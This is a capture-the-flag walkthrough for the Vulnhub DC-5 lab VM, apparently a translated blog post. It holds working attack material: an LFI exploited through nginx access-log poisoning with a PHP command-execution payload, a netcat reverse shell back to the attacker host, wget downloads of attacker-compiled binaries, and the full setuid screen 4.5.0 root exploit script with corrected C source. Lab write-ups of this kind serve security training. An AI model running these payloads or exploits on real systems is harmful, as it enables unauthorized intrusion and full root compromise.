
[Vulnhub] DC-5

Host discovery

netdiscover finds the target at 192.168.203.130.

Port scanning

With Nmap:

root@kali:~# nmap -sV -A 192.168.203.130 --script=vuln
Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-14 09:58 CST
Pre-scan script results:
| broadcast-avahi-dos: 
|   Discovered hosts:
|     224.0.0.251
|   After NULL UDP avahi packet DoS (CVE-2011-1002).
|_  Hosts are all up (not vulnerable).
Nmap scan report for 192.168.203.130
Host is up (0.00043s latency).
Not shown: 998 closed ports
PORT    STATE SERVICE VERSION
80/tcp  open  http    nginx 1.6.2
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
| http-csrf: 
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=192.168.203.130
|   Found the following possible CSRF vulnerabilities: 
|     
|     Path: http://192.168.203.130:80/contact.php
|     Form id: fname
|_    Form action: thankyou.php
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-server-header: nginx/1.6.2
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
111/tcp open  rpcbind 2-4 (RPC #100000)
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|   100000  3,4          111/udp6  rpcbind
|   100024  1          34063/udp   status
|   100024  1          40695/tcp   status
|   100024  1          45211/udp6  status
|_  100024  1          51852/tcp6  status
MAC Address: 00:0C:29:02:DC:93 (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop

TRACEROUTE
HOP RTT     ADDRESS
1   0.43 ms 192.168.203.130

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 105.29 seconds

This default scan (top 1000 TCP ports) only turns up 80 and 111. Note, though, that the rpcinfo output above already lists the status service (RPC program 100024, rpc.statd) on 40695/tcp, which explains the extra port a full-range scan reveals later.

Finding the flag

First, a look at the web service on port 80.

It is an ordinary site with no recognizable CMS, so let's try a directory scan.

Directory scanning

Using dirb, which ships with Kali:

root@kali:~/桌面# dirb http://192.168.203.130/

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Fri Feb 14 10:07:48 2020
URL_BASE: http://192.168.203.130/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: http://192.168.203.130/ ----
==> DIRECTORY: http://192.168.203.130/css/                                     
==> DIRECTORY: http://192.168.203.130/images/                                  
+ http://192.168.203.130/index.php (CODE:200|SIZE:4025)                        
                                                                               
---- Entering directory: http://192.168.203.130/css/ ----
                                                                               
---- Entering directory: http://192.168.203.130/images/ ----
                                                                               
-----------------
END_TIME: Fri Feb 14 10:07:56 2020
DOWNLOADED: 13836 - FOUND: 1

Nothing useful: only index.php plus the css/ and images/ directories.


Back to the site itself. The only interactive part is the Contact section.

We can submit some content there.

...but there seems to be nothing exploitable in it.

Following the usual boot-to-root reflex: this is a Linux box, so it ought to have port 22 open, but it does not. Perhaps SSH was moved to another port, so I rescanned the full port range.

Command: nmap -sV -p 1-65535 192.168.203.130

Sure enough, one more port shows up: 40695.

Connecting to it with telnet gets nowhere. That is expected: according to the rpcinfo output of the first scan, 40695/tcp is rpc.statd (RPC program 100024), not a relocated SSH service.


And there the trail went cold.

After checking a hint from a more experienced player, the problem is indeed in the web application, specifically that contact form.

After a submission we are redirected to thankyou.php.

Every time the page is refreshed, the Copyright line at the bottom changes.

Why would that happen?

File inclusion vulnerability

The relevant background here is footer.php.

Anyone who has built a site will know footer.php: it prints the page footer, the copyright line and other site-wide information at the bottom of each page, so a footer.php usually sits in the web root.

Let's request it directly:

It exists, and the number in it changes on every refresh.

That explains it: thankyou.php includes a file chosen by a request parameter, and when none is given it includes footer.php, whose own output is the changing copyright line.

Next, confirm the vulnerability by including /etc/passwd through the file parameter: thankyou.php?file=/etc/passwd

The include succeeds.

Exploiting the vulnerability

A Chrome extension identifies the web server as Nginx, matching the nginx/1.6.2 banner from the nmap scan.

So we can use nginx's logging: anything we put in a request (the URL or the User-Agent header) is written to the access log, and including that log through the LFI executes whatever PHP it contains. This only works because www-data can read /var/log/nginx/access.log on this box.

First a phpinfo() payload to check that the technique works:

<?php phpinfo();?>

It works.

Now a payload that runs system commands:

<?php system($_GET['cmd']);?>
With a listener waiting on the attacker machine (nc -lvnp 7777 on 192.168.203.129), the command to run is:

nc 192.168.203.129 7777 -e /bin/bash

which we pass as the cmd parameter directly in the URL:

http://192.168.203.130/thankyou.php?file=/var/log/nginx/access.log&cmd=nc 192.168.203.129 7777 -e /bin/bash

and the reverse shell comes back to the listener. Keep the payload small: once it is in the log, every include of access.log executes it again.

A look at the web root and a cat footer.php confirm it:

as expected, thankyou.php includes footer.php by default.

Privilege escalation

find / -user root -perm -4000 -print 2>/dev/null

This turns up screen.

Search for it with searchsploit:

The interesting one is 41154.sh (a local root exploit for setuid screen 4.5.0; check the installed screen version on the target before relying on it):

root@kali:~# cat 41154.sh
#!/bin/bash
# screenroot.sh
# setuid screen v4.5.0 local root exploit
# abuses ld.so.preload overwriting to get root.
# bug: https://lists.gnu.org/archive/html/screen-devel/2017-01/msg00025.html
# HACK THE PLANET
# ~ infodox (25/1/2017) 
echo "~ gnu/screenroot ~"
echo "[+] First, we create our shell and library..."
cat << EOF > /tmp/libhax.c
#include <stdio.h>
#include <sys/types.h>
#include <unistd.h>
__attribute__ ((__constructor__))
void dropshell(void){
    chown("/tmp/rootshell", 0, 0);
    chmod("/tmp/rootshell", 04755);
    unlink("/etc/ld.so.preload");
    printf("[+] done!\n");
}
EOF
gcc -fPIC -shared -ldl -o /tmp/libhax.so /tmp/libhax.c
rm -f /tmp/libhax.c
cat << EOF > /tmp/rootshell.c
#include <stdio.h>
int main(void){
    setuid(0);
    setgid(0);
    seteuid(0);
    setegid(0);
    execvp("/bin/sh", NULL, NULL);
}
EOF
gcc -o /tmp/rootshell /tmp/rootshell.c
rm -f /tmp/rootshell.c
echo "[+] Now we create our /etc/ld.so.preload file..."
cd /etc
umask 000 # because
screen -D -m -L ld.so.preload echo -ne  "\x0a/tmp/libhax.so" # newline needed
echo "[+] Triggering..."
screen -ls # screen itself is setuid, so... 

Following the script, we first save the shared library as libhax.c. Compared with the published script, the missing sys/stat.h include is added so chmod is declared and it compiles cleanly:

#include <stdio.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <unistd.h>
/* runs inside the setuid-root screen process when ld.so.preload loads us */
__attribute__ ((__constructor__))
void dropshell(void){
    chown("/tmp/rootshell", 0, 0);
    chmod("/tmp/rootshell", 04755);
    unlink("/etc/ld.so.preload");  /* stop preloading into every other process */
    printf("[+] done!\n");
}

Save this as libhax.c.

Then the shell itself. The published script calls execvp with three arguments and never includes unistd.h; older gcc only warns about that, but the corrected call below does the same thing and compiles without warnings:

#include <stdio.h>
#include <unistd.h>
int main(void){
    /* the binary is setuid root by the time we run, so these succeed */
    setuid(0);
    setgid(0);
    seteuid(0);
    setegid(0);
    execl("/bin/sh", "sh", (char *)NULL);
    return 1;  /* only reached if execl failed */
}

Save this as rootshell.c.

Then compile both as the script does. I compiled on the Kali box; the resulting binaries must match the target's architecture and libc, otherwise compile on the target itself if it has gcc:

gcc -fPIC -shared -ldl -o libhax.so  libhax.c
gcc -o rootshell rootshell.c

Serve the two compiled files from the attacker machine over HTTP on port 8080 and fetch them into /tmp on the target with wget:

www-data@dc-5:/tmp$ wget 192.168.203.129:8080/libhax.so
wget 192.168.203.129:8080/libhax.so
converted 'http://192.168.203.129:8080/libhax.so' (ANSI_X3.4-1968) -> 'http://192.168.203.129:8080/libhax.so' (UTF-8)
--2020-02-14 22:25:48--  http://192.168.203.129:8080/libhax.so
Connecting to 192.168.203.129:8080... connected.
HTTP request sent, awaiting response... 200 OK
Length: 16144 (16K) [application/octet-stream]
Saving to: 'libhax.so'

libhax.so           100%[=====================>]  15.77K  --.-KB/s   in 0s     

2020-02-14 22:25:48 (531 MB/s) - 'libhax.so' saved [16144/16144]

-----------------------------------------------------------------------------------
www-data@dc-5:/tmp$ wget http://192.168.203.129:8080/rootshell
wget http://192.168.203.129:8080/rootshell
converted 'http://192.168.203.129:8080/rootshell' (ANSI_X3.4-1968) -> 'http://192.168.203.129:8080/rootshell' (UTF-8)
--2020-02-14 22:24:42--  http://192.168.203.129:8080/rootshell
Connecting to 192.168.203.129:8080... connected.
HTTP request sent, awaiting response... 200 OK
Length: 16832 (16K) [application/octet-stream]
Saving to: 'rootshell'

rootshell           100%[=====================>]  16.44K  --.-KB/s   in 0s 

Then run the remaining commands from the script on the target:

cd /etc
umask 000 # because
screen -D -m -L ld.so.preload echo -ne  "\x0a/tmp/libhax.so" # newline needed
echo "[+] Triggering..."
screen -ls # screen itself is setuid, so... 

Finally go back to /tmp and run rootshell to get a root shell. The "cannot be preloaded ... ignored" message printed by screen -ls is the dynamic loader complaining about a preload entry it cannot open (the log file contains more than just our path); it is harmless. The "[+] done!" line comes from the constructor in libhax.so and shows it ran inside the setuid screen process, so /tmp/rootshell is now owned by root with the setuid bit set.

www-data@dc-5:/tmp$ cd /etc
cd /etc
www-data@dc-5:/etc$ umask 000
umask 000
www-data@dc-5:/etc$ screen -D -m -L ld.so.preload echo -ne  "\x0a/tmp/libhax.so"
<-D -m -L ld.so.preload echo -ne  "\x0a/tmp/libhax.so"                       
www-data@dc-5:/etc$ echo "[+] Triggering..."
echo "[+] Triggering..."
[+] Triggering...
www-data@dc-5:/etc$ screen -ls
screen -ls
' from /etc/ld.so.preload cannot be preloaded (cannot open shared object file): ignored.
[+] done!
No Sockets found in /tmp/screens/S-www-data.

www-data@dc-5:/etc$ cd /tmp
cd /tmp
www-data@dc-5:/tmp$ ./rootshell
./rootshell
# whoami
whoami
root
# 
-------------------------------------------------------------------------------
# cd /root
cd /root
# ls
ls
thisistheflag.txt
# cat thisistheflag.txt
cat thisistheflag.txt


888b    888 d8b                                                      888      888 888 888 
8888b   888 Y8P                                                      888      888 888 888 
88888b  888                                                          888      888 888 888 
888Y88b 888 888  .d8888b .d88b.       888  888  888  .d88b.  888d888 888  888 888 888 888 
888 Y88b888 888 d88P"   d8P  Y8b      888  888  888 d88""88b 888P"   888 .88P 888 888 888 
888  Y88888 888 888     88888888      888  888  888 888  888 888     888888K  Y8P Y8P Y8P 
888   Y8888 888 Y88b.   Y8b.          Y88b 888 d88P Y88..88P 888     888 "88b  "   "   "  
888    Y888 888  "Y8888P "Y8888        "Y8888888P"   "Y88P"  888     888  888 888 888 888 
                                                                                          
                                                                                          


Once again, a big thanks to all those who do these little challenges,
and especially all those who give me feedback - again, it's all greatly
appreciated.  :-)

I also want to send a big thanks to all those who find the vulnerabilities
and create the exploits that make these challenges possible.

Originally published on HackerGu's Blog; reproduction without permission is not allowed.